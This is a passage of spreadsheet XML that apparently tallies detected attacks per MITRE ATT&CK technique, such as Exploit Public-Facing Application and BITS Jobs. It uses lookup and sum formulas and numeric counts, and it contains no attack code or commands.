        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>5</v>
      </c>
      <c r="F33" s="579" t="str">
        <f t="shared" si="14"/>
        <v>2 (5)</v>
      </c>
      <c r="G33" s="292">
        <v>0</v>
      </c>
      <c r="H33" s="322">
        <v>0</v>
      </c>
      <c r="I33" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J33" s="12">
        <v>0</v>
      </c>
      <c r="K33" s="13">
        <v>0</v>
      </c>
      <c r="L33" s="394">
        <v>0</v>
      </c>
      <c r="M33" s="322">
        <v>0</v>
      </c>
      <c r="N33" s="322">
        <v>0</v>
      </c>
      <c r="O33" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P33" s="12">
        <v>0</v>
      </c>
      <c r="Q33" s="13">
        <v>0</v>
      </c>
      <c r="R33" s="394">
        <v>0</v>
      </c>
      <c r="S33" s="409">
        <v>0</v>
      </c>
      <c r="T33" s="4">
        <v>0</v>
      </c>
      <c r="U33" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="V33" s="4">
        <v>0</v>
      </c>
      <c r="W33" s="13">
        <v>0</v>
      </c>
      <c r="X33" s="394">
        <v>0</v>
      </c>
      <c r="Y33" s="392">
        <v>538</v>
      </c>
      <c r="Z33" s="392">
        <v>7</v>
      </c>
      <c r="AA33" s="322" t="str">
        <f t="shared" si="3"/>
        <v>7 (538)</v>
      </c>
      <c r="AB33" s="392">
        <v>2</v>
      </c>
      <c r="AC33" s="16">
        <v>1</v>
      </c>
      <c r="AD33" s="394">
        <v>4</v>
      </c>
      <c r="AE33" s="392">
        <v>1</v>
      </c>
      <c r="AF33" s="392">
        <v>1</v>
      </c>
      <c r="AG33" s="322" t="str">
        <f t="shared" si="4"/>
        <v>1 (1)</v>
      </c>
      <c r="AH33" s="392">
        <v>1</v>
      </c>
      <c r="AI33" s="16">
        <v>0.5</v>
      </c>
      <c r="AJ33" s="394">
        <v>1</v>
      </c>
      <c r="AK33" s="392">
        <v>539</v>
      </c>
      <c r="AL33" s="392">
        <v>8</v>
      </c>
      <c r="AM33" s="322" t="str">
        <f t="shared" si="5"/>
        <v>8 (539)</v>
      </c>
      <c r="AN33" s="392">
        <v>3</v>
      </c>
      <c r="AO33" s="16">
        <v>1</v>
      </c>
      <c r="AP33" s="394">
        <v>4</v>
      </c>
      <c r="AQ33" s="292">
        <v>0</v>
      </c>
      <c r="AR33" s="322">
        <v>0</v>
      </c>
      <c r="AS33" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT33" s="12">
        <v>0</v>
      </c>
      <c r="AU33" s="13">
        <v>0</v>
      </c>
      <c r="AV33" s="394">
        <v>0</v>
      </c>
      <c r="AW33" s="392">
        <v>0</v>
      </c>
      <c r="AX33" s="392">
        <v>0</v>
      </c>
      <c r="AY33" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ33" s="4">
        <v>0</v>
      </c>
      <c r="BA33" s="16">
        <v>0</v>
      </c>
      <c r="BB33" s="394">
        <v>0</v>
      </c>
      <c r="BC33" s="292">
        <v>0</v>
      </c>
      <c r="BD33" s="322">
        <v>0</v>
      </c>
      <c r="BE33" s="322" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BF33" s="12">
        <v>0</v>
      </c>
      <c r="BG33" s="13">
        <v>0</v>
      </c>
      <c r="BH33" s="394">
        <v>0</v>
      </c>
      <c r="BI33" s="292">
        <v>3</v>
      </c>
      <c r="BJ33" s="322">
        <v>3</v>
      </c>
      <c r="BK33" s="322" t="str">
        <f t="shared" si="9"/>
        <v>3 (3)</v>
      </c>
      <c r="BL33" s="12">
        <v>1</v>
      </c>
      <c r="BM33" s="13">
        <v>0.5</v>
      </c>
      <c r="BN33" s="394">
        <v>3</v>
      </c>
      <c r="BO33" s="292">
        <v>8</v>
      </c>
      <c r="BP33" s="322">
        <v>8</v>
      </c>
      <c r="BQ33" s="322" t="str">
        <f t="shared" si="10"/>
        <v>8 (8)</v>
      </c>
      <c r="BR33" s="12">
        <v>1</v>
      </c>
      <c r="BS33" s="12">
        <v>2</v>
      </c>
      <c r="BT33" s="13">
        <v>1</v>
      </c>
      <c r="BU33" s="394">
        <v>5</v>
      </c>
      <c r="BV33" s="292">
        <v>0</v>
      </c>
      <c r="BW33" s="322">
        <v>0</v>
      </c>
      <c r="BX33" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY33" s="12">
        <v>0</v>
      </c>
      <c r="BZ33" s="13">
        <v>0</v>
      </c>
      <c r="CA33" s="394">
        <v>0</v>
      </c>
      <c r="CB33" s="292">
        <v>9</v>
      </c>
      <c r="CC33" s="322">
        <v>4</v>
      </c>
      <c r="CD33" s="322" t="str">
        <f t="shared" si="12"/>
        <v>4 (9)</v>
      </c>
      <c r="CE33" s="12">
        <v>0</v>
      </c>
      <c r="CF33" s="12">
        <v>1</v>
      </c>
      <c r="CG33" s="13">
        <v>1</v>
      </c>
      <c r="CH33" s="394">
        <v>4</v>
      </c>
    </row>
    <row r="34" spans="1:86" ht="15" customHeight="1">
      <c r="A34" s="4">
        <f t="shared" si="13"/>
        <v>32</v>
      </c>
      <c r="B34" s="4" t="str">
        <f>IFERROR(VLOOKUP(A34,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1190</v>
      </c>
      <c r="C34" s="493" t="str">
        <f>IFERROR(VLOOKUP(B34,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Exploit Public-Facing Application</v>
      </c>
      <c r="D34" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B34)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>5</v>
      </c>
      <c r="E34" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>130</v>
      </c>
      <c r="F34" s="579" t="str">
        <f t="shared" si="14"/>
        <v>5 (130)</v>
      </c>
      <c r="G34" s="292">
        <v>41</v>
      </c>
      <c r="H34" s="322">
        <v>39</v>
      </c>
      <c r="I34" s="322" t="str">
        <f t="shared" si="0"/>
        <v>39 (41)</v>
      </c>
      <c r="J34" s="12">
        <v>2</v>
      </c>
      <c r="K34" s="13">
        <v>0.8</v>
      </c>
      <c r="L34" s="394">
        <v>39</v>
      </c>
      <c r="M34" s="322">
        <v>135</v>
      </c>
      <c r="N34" s="322">
        <v>133</v>
      </c>
      <c r="O34" s="322" t="str">
        <f t="shared" si="1"/>
        <v>133 (135)</v>
      </c>
      <c r="P34" s="12">
        <v>13</v>
      </c>
      <c r="Q34" s="13">
        <v>0.6</v>
      </c>
      <c r="R34" s="394">
        <v>63</v>
      </c>
      <c r="S34" s="409">
        <v>176</v>
      </c>
      <c r="T34" s="4">
        <v>172</v>
      </c>
      <c r="U34" s="322" t="str">
        <f t="shared" si="2"/>
        <v>172 (176)</v>
      </c>
      <c r="V34" s="4">
        <v>15</v>
      </c>
      <c r="W34" s="13">
        <v>1</v>
      </c>
      <c r="X34" s="394">
        <v>73</v>
      </c>
      <c r="Y34" s="392">
        <v>272</v>
      </c>
      <c r="Z34" s="392">
        <v>262</v>
      </c>
      <c r="AA34" s="322" t="str">
        <f t="shared" si="3"/>
        <v>262 (272)</v>
      </c>
      <c r="AB34" s="392">
        <v>13</v>
      </c>
      <c r="AC34" s="16">
        <v>1</v>
      </c>
      <c r="AD34" s="394">
        <v>123</v>
      </c>
      <c r="AE34" s="392">
        <v>213</v>
      </c>
      <c r="AF34" s="392">
        <v>210</v>
      </c>
      <c r="AG34" s="322" t="str">
        <f t="shared" si="4"/>
        <v>210 (213)</v>
      </c>
      <c r="AH34" s="392">
        <v>17</v>
      </c>
      <c r="AI34" s="16">
        <v>0.6</v>
      </c>
      <c r="AJ34" s="394">
        <v>105</v>
      </c>
      <c r="AK34" s="392">
        <v>416</v>
      </c>
      <c r="AL34" s="392">
        <v>405</v>
      </c>
      <c r="AM34" s="322" t="str">
        <f t="shared" si="5"/>
        <v>405 (416)</v>
      </c>
      <c r="AN34" s="392">
        <v>27</v>
      </c>
      <c r="AO34" s="16">
        <v>1</v>
      </c>
      <c r="AP34" s="394">
        <v>123</v>
      </c>
      <c r="AQ34" s="292">
        <v>0</v>
      </c>
      <c r="AR34" s="322">
        <v>0</v>
      </c>
      <c r="AS34" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT34" s="12">
        <v>0</v>
      </c>
      <c r="AU34" s="13">
        <v>0</v>
      </c>
      <c r="AV34" s="394">
        <v>0</v>
      </c>
      <c r="AW34" s="392">
        <v>3</v>
      </c>
      <c r="AX34" s="392">
        <v>3</v>
      </c>
      <c r="AY34" s="322" t="str">
        <f t="shared" si="7"/>
        <v>3 (3)</v>
      </c>
      <c r="AZ34" s="4">
        <v>2</v>
      </c>
      <c r="BA34" s="16">
        <v>0.6</v>
      </c>
      <c r="BB34" s="394">
        <v>3</v>
      </c>
      <c r="BC34" s="292">
        <v>179</v>
      </c>
      <c r="BD34" s="322">
        <v>175</v>
      </c>
      <c r="BE34" s="322" t="str">
        <f t="shared" si="8"/>
        <v>175 (179)</v>
      </c>
      <c r="BF34" s="12">
        <v>17</v>
      </c>
      <c r="BG34" s="13">
        <v>1</v>
      </c>
      <c r="BH34" s="394">
        <v>73</v>
      </c>
      <c r="BI34" s="292">
        <v>104</v>
      </c>
      <c r="BJ34" s="322">
        <v>101</v>
      </c>
      <c r="BK34" s="322" t="str">
        <f t="shared" si="9"/>
        <v>101 (104)</v>
      </c>
      <c r="BL34" s="12">
        <v>1</v>
      </c>
      <c r="BM34" s="13">
        <v>1</v>
      </c>
      <c r="BN34" s="394">
        <v>101</v>
      </c>
      <c r="BO34" s="292">
        <v>149</v>
      </c>
      <c r="BP34" s="322">
        <v>146</v>
      </c>
      <c r="BQ34" s="322" t="str">
        <f t="shared" si="10"/>
        <v>146 (149)</v>
      </c>
      <c r="BR34" s="12">
        <v>1</v>
      </c>
      <c r="BS34" s="12">
        <v>1</v>
      </c>
      <c r="BT34" s="13">
        <v>1</v>
      </c>
      <c r="BU34" s="394">
        <v>110</v>
      </c>
      <c r="BV34" s="292">
        <v>1</v>
      </c>
      <c r="BW34" s="322">
        <v>1</v>
      </c>
      <c r="BX34" s="322" t="str">
        <f t="shared" si="11"/>
        <v>1 (1)</v>
      </c>
      <c r="BY34" s="12">
        <v>1</v>
      </c>
      <c r="BZ34" s="13">
        <v>0.2</v>
      </c>
      <c r="CA34" s="394">
        <v>1</v>
      </c>
      <c r="CB34" s="292">
        <v>197</v>
      </c>
      <c r="CC34" s="322">
        <v>121</v>
      </c>
      <c r="CD34" s="322" t="str">
        <f t="shared" si="12"/>
        <v>121 (197)</v>
      </c>
      <c r="CE34" s="12">
        <v>0</v>
      </c>
      <c r="CF34" s="12">
        <v>1</v>
      </c>
      <c r="CG34" s="13">
        <v>0.6</v>
      </c>
      <c r="CH34" s="394">
        <v>121</v>
      </c>
    </row>
    <row r="35" spans="1:86" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A35" s="4">
        <f t="shared" si="13"/>
        <v>33</v>
      </c>
      <c r="B35" s="4" t="str">
        <f>IFERROR(VLOOKUP(A35,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1197</v>
      </c>
      <c r="C35" s="493" t="str">
        <f>IFERROR(VLOOKUP(B35,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>BITS Jobs</v>
      </c>
      <c r="D35" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B35)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E35" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>43</v>
      </c>
      <c r="F35" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (43)</v>
      </c>
      <c r="G35" s="292">
        <v>0</v>
      </c>
      <c r="H35" s="322">
        <v>0</v>
      </c>
      <c r="I35" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J35" s="12">
        <v>0</v>
      </c>
      <c r="K35" s="13">
        <v>0</v>
      </c>
      <c r="L35" s="394">
        <v>0</v>
      </c>
      <c r="M35" s="322">
        <v>8</v>
      </c>
      <c r="N35" s="322">
        <v>8</v>
      </c>
      <c r="O35" s="322" t="str">
        <f t="shared" si="1"/>
        <v>8 (8)</v>
      </c>
      <c r="P35" s="12">
        <v>2</v>
      </c>
      <c r="Q35" s="13">
        <v>1</v>
      </c>
      <c r="R35" s="394">
        <v>8</v>
      </c>
      <c r="S35" s="409">
        <v>8</v>
      </c>
      <c r="T35" s="4">
        <v>8</v>
      </c>
      <c r="U35" s="322" t="str">
        <f t="shared" si="2"/>
        <v>8 (8)</v>
      </c>
      <c r="V35" s="4">
        <v>2</v>
      </c>
      <c r="W35" s="13">
        <v>1</v>
      </c>
      <c r="X35" s="394">
        <v>8</v>
      </c>
      <c r="Y35" s="392">
        <v>34</v>
      </c>
      <c r="Z35" s="392">
        <v>28</v>
      </c>
      <c r="AA35" s="322" t="str">
        <f t="shared" si="3"/>
        <v>28 (34)</v>
      </c>
      <c r="AB35" s="392">
        <v>5</v>
      </c>
      <c r="AC35" s="16">
        <v>1</v>
      </c>
      <c r="AD35" s="394">
        <v>10</v>
      </c>
      <c r="AE35" s="392">
        <v>16</v>
      </c>
      <c r="AF35" s="392">
        <v>16</v>
      </c>
      <c r="AG35" s="322" t="str">
        <f t="shared" si="4"/>
        <v>16 (16)</v>
      </c>
      <c r="AH35" s="392">
        <v>4</v>
      </c>
      <c r="AI35" s="16">
        <v>1</v>
      </c>
      <c r="AJ35" s="394">
        <v>8</v>
      </c>
      <c r="AK35" s="392">
        <v>50</v>
      </c>
      <c r="AL35" s="392">
        <v>44</v>
      </c>
      <c r="AM35" s="322" t="str">
        <f t="shared" si="5"/>
        <v>44 (50)</v>
      </c>
      <c r="AN35" s="392">
        <v>9</v>
      </c>
      <c r="AO35" s="16">
        <v>1</v>
      </c>
      <c r="AP35" s="394">
        <v>10</v>
      </c>
      <c r="AQ35" s="292">
        <v>0</v>
      </c>
      <c r="AR35" s="322">
        <v>0</v>
      </c>
      <c r="AS35" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT35" s="12">
        <v>0</v>
      </c>
      <c r="AU35" s="13">
        <v>0</v>
      </c>
      <c r="AV35" s="394">
        <v>0</v>
      </c>
      <c r="AW35" s="392">
        <v>0</v>
      </c>
      <c r="AX35" s="392">
        <v>0</v>
      </c>
      <c r="AY35" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ35" s="4">
        <v>0</v>
      </c>
      <c r="BA35" s="16">
        <v>0</v>
      </c>
      <c r="BB35" s="394">
        <v>0</v>
      </c>
      <c r="BC35" s="292">
        <v>8</v>
      </c>
      <c r="BD35" s="322">
        <v>8</v>
      </c>
      <c r="BE35" s="322" t="str">
        <f t="shared" si="8"/>
        <v>8 (8)</v>
      </c>
      <c r="BF35" s="12">
        <v>2</v>
      </c>
      <c r="BG35" s="13">
        <v>1</v>
      </c>
      <c r="BH35" s="394">
        <v>8</v>
      </c>
      <c r="BI35" s="292">
        <v>5</v>
      </c>
      <c r="BJ35" s="322">
        <v>3</v>
      </c>
      <c r="BK35" s="322" t="str">
        <f t="shared" si="9"/>
        <v>3 (5)</v>
      </c>
      <c r="BL35" s="12">
        <v>2</v>
      </c>
      <c r="BM35" s="13">
        <v>1</v>
      </c>
      <c r="BN35" s="394">
        <v>2</v>
      </c>
      <c r="BO35" s="292">
        <v>24</v>
      </c>
      <c r="BP35" s="322">
        <v>18</v>
      </c>
      <c r="BQ35" s="322" t="str">
        <f t="shared" si="10"/>
        <v>18 (24)</v>
      </c>
      <c r="BR35" s="12">
        <v>2</v>
      </c>
      <c r="BS35" s="12">
        <v>6</v>
      </c>
      <c r="BT35" s="13">
        <v>1</v>
      </c>
      <c r="BU35" s="394">
        <v>17</v>
      </c>
      <c r="BV35" s="292">
        <v>0</v>
      </c>
      <c r="BW35" s="322">
        <v>0</v>
      </c>
      <c r="BX35" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY35" s="12">
        <v>0</v>
      </c>
      <c r="BZ35" s="13">
        <v>0</v>
      </c>
      <c r="CA35" s="394">
        <v>0</v>
      </c>
      <c r="CB35" s="292">
        <v>8</v>
      </c>
      <c r="CC35" s="322">
        <v>8</v>
      </c>
      <c r="CD35" s="322" t="str">
        <f t="shared" si="12"/>
        <v>8 (8)</v>
      </c>
      <c r="CE35" s="12">
        <v>0</v>
      </c>
      <c r="CF35" s="12">
        <v>1</v>
      </c>
      <c r="CG35" s="13">
        <v>1</v>
      </c>
      <c r="CH35" s="394">
        <v>8</v>
      </c>
    </row>
    <row r="36" spans="1:86" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A36" s="4">
        <f t="shared" si="13"/>
        <v>34</v>
      </c>
      <c r="B36" s="4" t="str">
        <f>IFERROR(VLOOKUP(A36,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1199</v>
      </c>
      <c r="C36" s="493" t="str">
        <f>IFERROR(VLOOKUP(B36,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Trusted Relationship</v>
      </c>
      <c r="D36" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B36)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E36" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>18</v>
      </c>
      <c r="F36" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (18)</v>
      </c>
      <c r="G36" s="292">
        <v>0</v>
      </c>
      <c r="H36" s="322">
        <v>0</v>
      </c>
      <c r="I36" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J36" s="12">
        <v>0</v>
      </c>
      <c r="K36" s="13">
        <v>0</v>
      </c>
      <c r="L36" s="394">
        <v>0</v>
      </c>
      <c r="M36" s="322">
        <v>0</v>
      </c>
      <c r="N36" s="322">
        <v>0</v>
      </c>
      <c r="O36" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P36" s="12">
        <v>0</v>
      </c>
      <c r="Q36" s="13">
        <v>0</v>
      </c>
      <c r="R36" s="394">
        <v>0</v>
      </c>
      <c r="S36" s="409">
        <v>0</v>
      </c>
      <c r="T36" s="4">
        <v>0</v>
      </c>
      <c r="U36" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="V36" s="4">
        <v>0</v>
      </c>
      <c r="W36" s="13">
        <v>0</v>
      </c>
      <c r="X36" s="394">
        <v>0</v>
      </c>
      <c r="Y36" s="392">
        <v>0</v>
      </c>
      <c r="Z36" s="392">
        <v>0</v>
      </c>
      <c r="AA36" s="322" t="str">
        <f t="shared" si="3"/>
        <v>0 (0)</v>
      </c>
      <c r="AB36" s="392">
        <v>0</v>
      </c>
      <c r="AC36" s="16">
        <v>0</v>
      </c>
      <c r="AD36" s="394">
        <v>0</v>
      </c>
      <c r="AE36" s="392">
        <v>6</v>
      </c>
      <c r="AF36" s="392">
        <v>6</v>
      </c>
      <c r="AG36" s="322" t="str">
        <f t="shared" si="4"/>
        <v>6 (6)</v>
      </c>
      <c r="AH36" s="392">
        <v>5</v>
      </c>
      <c r="AI36" s="16">
        <v>1</v>
      </c>
      <c r="AJ36" s="394">
        <v>3</v>
      </c>
      <c r="AK36" s="392">
        <v>6</v>
      </c>
      <c r="AL36" s="392">
        <v>6</v>
      </c>
      <c r="AM36" s="322" t="str">
        <f t="shared" si="5"/>
        <v>6 (6)</v>
      </c>
      <c r="AN36" s="392">
        <v>5</v>
      </c>
      <c r="AO36" s="16">
        <v>1</v>
      </c>
      <c r="AP36" s="394">
        <v>3</v>
      </c>
      <c r="AQ36" s="292">
        <v>0</v>
      </c>
      <c r="AR36" s="322">
        <v>0</v>
      </c>
      <c r="AS36" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT36" s="12">
        <v>0</v>
      </c>
      <c r="AU36" s="13">
        <v>0</v>
      </c>
      <c r="AV36" s="394">
        <v>0</v>
      </c>
      <c r="AW36" s="392">
        <v>0</v>
      </c>
      <c r="AX36" s="392">
        <v>0</v>
      </c>
      <c r="AY36" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ36" s="4">
        <v>0</v>
      </c>
      <c r="BA36" s="16">
        <v>0</v>
      </c>
      <c r="BB36" s="394">
        <v>0</v>
      </c>
      <c r="BC36" s="292">
        <v>0</v>
      </c>
      <c r="BD36" s="322">
        <v>0</v>
      </c>
      <c r="BE36" s="322" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BF36" s="12">
        <v>0</v>
      </c>
      <c r="BG36" s="13">
        <v>0</v>
      </c>
      <c r="BH36" s="394">
        <v>0</v>
      </c>
      <c r="BI36" s="292">
        <v>1</v>
      </c>
      <c r="BJ36" s="322">
        <v>1</v>
      </c>
      <c r="BK36" s="322" t="str">
        <f t="shared" si="9"/>
        <v>1 (1)</v>
      </c>
      <c r="BL36" s="12">
        <v>1</v>
      </c>
      <c r="BM36" s="13">
        <v>1</v>
      </c>
      <c r="BN36" s="394">
        <v>1</v>
      </c>
      <c r="BO36" s="292">
        <v>11</v>
      </c>
      <c r="BP36" s="322">
        <v>11</v>
      </c>
      <c r="BQ36" s="322" t="str">
        <f t="shared" si="10"/>
        <v>11 (11)</v>
      </c>
      <c r="BR36" s="12">
        <v>1</v>
      </c>
      <c r="BS36" s="12">
        <v>4</v>
      </c>
      <c r="BT36" s="13">
        <v>1</v>
      </c>
      <c r="BU36" s="394">
        <v>10</v>
      </c>
      <c r="BV36" s="292">
        <v>0</v>
      </c>
      <c r="BW36" s="322">
        <v>0</v>
      </c>
      <c r="BX36" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY36" s="12">
        <v>0</v>
      </c>
      <c r="BZ36" s="13">
        <v>0</v>
      </c>
      <c r="CA36" s="394">
        <v>0</v>
      </c>
      <c r="CB36" s="292">
        <v>0</v>
      </c>
      <c r="CC36" s="322">
        <v>0</v>
      </c>
      <c r="CD36" s="322" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE36" s="12">
        <v>0</v>
      </c>
      <c r="CF36" s="12">
        <v>0</v>
      </c>
      <c r="CG36" s="13">
        <v>0</v>
      </c>
      <c r="CH36" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="37" spans="1:86" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A37" s="4">
        <f t="shared" si="13"/>
        <v>35</v>
      </c>
      <c r="B37" s="4" t="str">
        <f>IFERROR(VLOOKUP(A37,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1200</v>
      </c>
      <c r="C37" s="493" t="str">
        <f>IFERROR(VLOOKUP(B37,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Hardware Additions</v>
      </c>
      <c r="D37" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B37)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E37" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>3</v>
      </c>
      <c r="F37" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (3)</v>
      </c>
      <c r="G37" s="292">
        <v>0</v>
      </c>
      <c r="H37" s="322">
        <v>0</v>
      </c>
      <c r="I37" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J37" s="12">
        <v>0</v>
      </c>
      <c r="K37" s="13">
        <v>0</v>
      </c>
      <c r="L37" s="394">
        <v>0</v>
      </c>
      <c r="M37" s="322">
        <v>0</v>
      </c>
      <c r="N37" s="322">
        <v>0</v>
      </c>
      <c r="O37" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P37" s="12">
        <v>0</v>
      </c>
      <c r="Q37" s="13">
        <v>0</v>
      </c>
      <c r="R37" s="394">
        <v>0</v>
      </c>
      <c r="S37" s="409">
        <v>0</v>
      </c>
      <c r="T37" s="4">
        <v>0</v>
      </c>
      <c r="U37" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="V37" s="4">
        <v>0</v>
      </c>
      <c r="W37" s="13">
        <v>0</v>
      </c>
      <c r="X37" s="394">
        <v>0</v>
      </c>
      <c r="Y37" s="392">
        <v>1</v>
      </c>
      <c r="Z37" s="392">
        <v>1</v>
      </c>
      <c r="AA37" s="322" t="str">
        <f t="shared" si="3"/>
        <v>1 (1)</v>
      </c>
      <c r="AB37" s="392">
        <v>1</v>
      </c>
      <c r="AC37" s="16">
        <v>1</v>
      </c>
      <c r="AD37" s="394">
        <v>1</v>
      </c>
      <c r="AE37" s="392">
        <v>0</v>
      </c>
      <c r="AF37" s="392">
        <v>0</v>
      </c>
      <c r="AG37" s="322" t="str">
        <f t="shared" si="4"/>
        <v>0 (0)</v>
      </c>
      <c r="AH37" s="392">
        <v>0</v>
      </c>
      <c r="AI37" s="16">
        <v>0</v>
      </c>
      <c r="AJ37" s="394">
        <v>0</v>
      </c>
      <c r="AK37" s="392">
        <v>1</v>
      </c>
      <c r="AL37" s="392">
        <v>1</v>
      </c>
      <c r="AM37" s="322" t="str">
        <f t="shared" si="5"/>
        <v>1 (1)</v>
      </c>
      <c r="AN37" s="392">
        <v>1</v>
      </c>
      <c r="AO37" s="16">
        <v>1</v>
      </c>
      <c r="AP37" s="394">
        <v>1</v>
      </c>
      <c r="AQ37" s="292">
        <v>0</v>
      </c>
      <c r="AR37" s="322">
        <v>0</v>
      </c>
      <c r="AS37" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT37" s="12">
        <v>0</v>
      </c>
      <c r="AU37" s="13">
        <v>0</v>
      </c>
      <c r="AV37" s="394">
        <v>0</v>
      </c>
      <c r="AW37" s="392">
        <v>1</v>
      </c>
      <c r="AX37" s="392">
        <v>1</v>
      </c>
      <c r="AY37" s="322" t="str">
        <f t="shared" si="7"/>
        <v>1 (1)</v>
      </c>
      <c r="AZ37" s="4">
        <v>1</v>
      </c>
      <c r="BA37" s="16">
        <v>1</v>
      </c>
      <c r="BB37" s="394">
        <v>1</v>
      </c>
      <c r="BC37" s="292">
        <v>1</v>
      </c>
      <c r="BD37" s="322">
        <v>1</v>
      </c>
      <c r="BE37" s="322" t="str">
        <f t="shared" si="8"/>
        <v>1 (1)</v>
      </c>
      <c r="BF37" s="12">
        <v>1</v>
      </c>
      <c r="BG37" s="13">
        <v>1</v>
      </c>
      <c r="BH37" s="394">
        <v>1</v>
      </c>
      <c r="BI37" s="292">
        <v>0</v>
      </c>
      <c r="BJ37" s="322">
        <v>0</v>
      </c>
      <c r="BK37" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL37" s="12">
        <v>0</v>
      </c>
      <c r="BM37" s="13">
        <v>0</v>
      </c>
      <c r="BN37" s="394">
        <v>0</v>
      </c>
      <c r="BO37" s="292">
        <v>3</v>
      </c>
      <c r="BP37" s="322">
        <v>3</v>
      </c>
      <c r="BQ37" s="322" t="str">
        <f t="shared" si="10"/>
        <v>3 (3)</v>
      </c>
      <c r="BR37" s="12">
        <v>0</v>
      </c>
      <c r="BS37" s="12">
        <v>3</v>
      </c>
      <c r="BT37" s="13">
        <v>1</v>
      </c>
      <c r="BU37" s="394">
        <v>3</v>
      </c>
      <c r="BV37" s="292">
        <v>0</v>
      </c>
      <c r="BW37" s="322">
        <v>0</v>
      </c>
      <c r="BX37" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY37" s="12">
        <v>0</v>
      </c>
      <c r="BZ37" s="13">
        <v>0</v>
      </c>
      <c r="CA37" s="394">
        <v>0</v>
      </c>
      <c r="CB37" s="292">
        <v>1</v>
      </c>
      <c r="CC37" s="322">
        <v>1</v>
      </c>
      <c r="CD37" s="322" t="str">
        <f t="shared" si="12"/>
        <v>1 (1)</v>
      </c>
      <c r="CE37" s="12">
        <v>0</v>
      </c>
      <c r="CF37" s="12">
        <v>1</v>
      </c>
      <c r="CG37" s="13">
        <v>1</v>
